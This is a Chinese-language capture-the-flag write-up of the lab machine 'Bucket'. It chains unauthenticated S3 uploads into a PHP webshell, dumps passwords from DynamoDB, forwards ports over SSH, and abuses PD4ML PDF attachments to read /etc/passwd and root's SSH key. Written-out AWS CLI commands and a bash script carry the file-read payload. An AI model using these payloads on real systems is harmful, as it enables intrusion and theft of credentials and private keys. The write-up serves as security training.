信息收集
端口扫描
data:image/s3,"s3://crabby-images/0ba81/0ba8198fa54eb92f3d44cb860937a4bc92aa2d8e" alt=""
Web站点
data:image/s3,"s3://crabby-images/dcf45/dcf457148723fca13efd352053d116e28ddc43cd" alt=""
可以看到一个s3.bucket.htb
Get User Flag
S3未授权访问
但是很可惜,没什么有价值的内容
data:image/s3,"s3://crabby-images/d81fc/d81fc25a35f62828941a71ca3d9a4f507ed86979" alt=""
Fuzzing出个Shell来
data:image/s3,"s3://crabby-images/7efdb/7efdb8b2e8094595a9dfb4973ac2dfc52bcd5494" alt=""
直接访问的话会跳到一个奇怪的地址
data:image/s3,"s3://crabby-images/d3f2d/d3f2d274897dc697440df45b02e4321b90d8356a" alt=""
文件上传
既然S3存在未授权访问,那我们可以试试往上面PUT文件。整个PHP上去要是能解析的话就拿下了
data:image/s3,"s3://crabby-images/59027/59027626498bd3bcc0c1a415eb5d869fef5a4e3a" alt=""
可惜还是不行,在这边访问只能下载
data:image/s3,"s3://crabby-images/7d41d/7d41d1f4d2e369ce4e92c6d7fd959c2540a157a3" alt=""
后面留意到,这adserver/index.html跟主站的内容是一样的。是不是能在主站访问我们上传的PHP呢?
data:image/s3,"s3://crabby-images/1dd6a/1dd6ac81b6b7f24a39367d4648dabb1e0c167e68" alt=""
确实是,总是喜欢搞这些小把戏
data:image/s3,"s3://crabby-images/9b410/9b410d8e91b3576b3d061794ffba450a309a5cfb" alt=""
直接反弹Shell
data:image/s3,"s3://crabby-images/ceddb/ceddb0c9060b9eb60c92156cf0562d67dcd87486" alt=""
data:image/s3,"s3://crabby-images/4907a/4907a3a98a3b6d4384e41830b43f299cf11a4d32" alt=""
容器逃逸
信息收集
linpeas发现了aws凭据,可以现在没有权限
data:image/s3,"s3://crabby-images/2cad7/2cad7afdf8844a83164e4b1b501f4c5ba40aaf2a" alt=""
data:image/s3,"s3://crabby-images/736bd/736bdef7a21f6f2f6c67fb7982ef49ece94363a6" alt=""
root跑了个DynamoDB
data:image/s3,"s3://crabby-images/99622/9962223469173a8f524a3662c8d574e84f206586" alt=""
端口信息
data:image/s3,"s3://crabby-images/46c60/46c60d2ba7886315817e9cb77769346866a48641" alt=""
roy用户的bashrc可读
data:image/s3,"s3://crabby-images/b2fd1/b2fd1903e6d1c2664753864e9541ab69ec7f0b42" alt=""
这里设置了目录ACL,也属于人为动作,到时候可以关注一下
data:image/s3,"s3://crabby-images/1bfe1/1bfe14c878e97dfbd704f36fbb96b751128f7d3f" alt=""
数据库密码泄露
这里发现了一些roy用户的项目文件
data:image/s3,"s3://crabby-images/ffb78/ffb7833928068176be56eb315eecfdf5322744fa" alt=""
有个db.php可以看看,很可能存在密码
data:image/s3,"s3://crabby-images/9128c/9128c9e982186be99cffbd30af3eda6fc50e9a91" alt=""
这里用aws sdk去连接DynamoDB,而且不需要AKSK。相当于存在未授权访问的DynamoDB,我们可以直接使用aws cli连接
data:image/s3,"s3://crabby-images/336c7/336c770597741c975ab6fbc53ec213d55bb715ba" alt=""
失败了,问了一下GPT。aws会在家目录创建一个.aws用户存储配置。所以这里把家目录改成/tmp即可
获取用户数据
data:image/s3,"s3://crabby-images/b1e05/b1e0538a2993bc1d73cf0b17e779676c5c028b4e" alt=""
密码重用
这里拿到几个密码,可以试一下ssh
data:image/s3,"s3://crabby-images/74e67/74e679849cad88bdbeae8773ae4a02f156e2a027" alt=""
Get Root Flag
data:image/s3,"s3://crabby-images/55bc2/55bc297a12ffd5c104331a24ce77f2be32d9445a" alt=""
感觉这里大有可为嘛,查一下web服务配置。看看这个站点如何访问。
只监听了127.0.0.1跟之前端口信息那边对应上了
data:image/s3,"s3://crabby-images/112ff/112ffdd385db0dd435ce2f77b889b70b654d61ac" alt=""
端口转发
靶机内8000端口转至VPS
1
| ssh -L 8000:127.0.0.1:8000 roy@bucket.htb -fN
|
VPS 8000端口转至本地
1
| ssh -L 8000:127.0.0.1:8000 aurey@43.134.44.115 -fN
|
data:image/s3,"s3://crabby-images/fc667/fc667bef263e2218f5a5b67cbcef31a898a7d03d" alt=""
还是去了解一下这个pd4ml_demo.jar
吧
PD4ML 是一个流行的 Java 库,旨在方便地将 HTML 内容转换为高质量的打印输出或可下载的 PDF 文档。它可以在服务器端运行,并且具有可配置的页面布局、分页、字体嵌入、图像处理和其他各种功能。
HackTricks是个好东西,可以利用PD4ML读文件
data:image/s3,"s3://crabby-images/33e08/33e08f4cd28dade746383a7b0b423cfa2c020a39" alt=""
PD4ML读文件
还是回到index.php这段代码:
- 在alerts表中筛选title属性为Ransomware的项
- 写入到files/random.html中
- 通过PD4ML将files/random.html转成PDF
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
| <?php require 'vendor/autoload.php'; use Aws\DynamoDb\DynamoDbClient; if($_SERVER["REQUEST_METHOD"]==="POST") { if($_POST["action"]==="get_alerts") { date_default_timezone_set('America/New_York'); $client = new DynamoDbClient([ 'profile' => 'default', 'region' => 'us-east-1', 'version' => 'latest', 'endpoint' => 'http://localhost:4566' ]);
$iterator = $client->getIterator('Scan', array( 'TableName' => 'alerts', 'FilterExpression' => "title = :title", 'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")), ));
foreach ($iterator as $item) { $name=rand(1,10000).'.html'; file_put_contents('files/'.$name,$item["data"]); } passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf"); } } else { ?>
|
我们可以先试一下这个过程
按照GPT的指示先创个alters表
1 2
| aws --endpoint-url=http://localhost:4566 dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5
|
写个符合条件的内容进去
1
| aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html>testtest</html>"}}'
|
然后访问index.php POST指定的数据action=get_alerts
可以看到生成了文件,但是想访问的时候又没了(又要拼手速了)
data:image/s3,"s3://crabby-images/a8f99/a8f995f3f52f8ee3b1eab387dcac4886092bf7a0" alt=""
后面发现alters表也会被删除,我们直接写个脚本吧
1 2 3 4 5
| #!/bin/bash aws --endpoint-url=http://localhost:4566 dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html>testtest</html>"}}' curl http://localhost:8000/index.php -d 'action=get_alerts' wget http://localhost:8000/files/result.pdf
|
这下确实可以看到我们生成的pdf了,下面利用PD4ML读文件
1
| aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src='\''file:///etc/passwd'\'' description='\''test'\'' icon='\''Paperclip'\''/></html>"}}'
|
成功读到了/etc/passwd
data:image/s3,"s3://crabby-images/488c9/488c94d2d83c047d613383ff5c52ef8546de4858" alt=""
先看看/root
目录下都有些啥
data:image/s3,"s3://crabby-images/715fb/715fb270c536c54048abed9ac88fc9f1db023b5c" alt=""
然后可以直接读 /root/root.txt
data:image/s3,"s3://crabby-images/19faf/19faf687bae6cfaba883068cfa54fcd140869cb9" alt=""
但作为Hacker还是得GetShell,我们直接读/root/.ssh/id_rsa
使用私钥登录到root
data:image/s3,"s3://crabby-images/d86bc/d86bc858fb1a59e216799b9185eb6b827ab18481" alt=""
总结
User Flag:S3未授权 ⇒ 上传WebShell ⇒ 数据库泄露密码 ⇒ 密码复用逃逸到宿主机
Root Flag:DynamoDB未授权 ⇒ bucket-app代码泄露 ⇒ PD4ML文件读取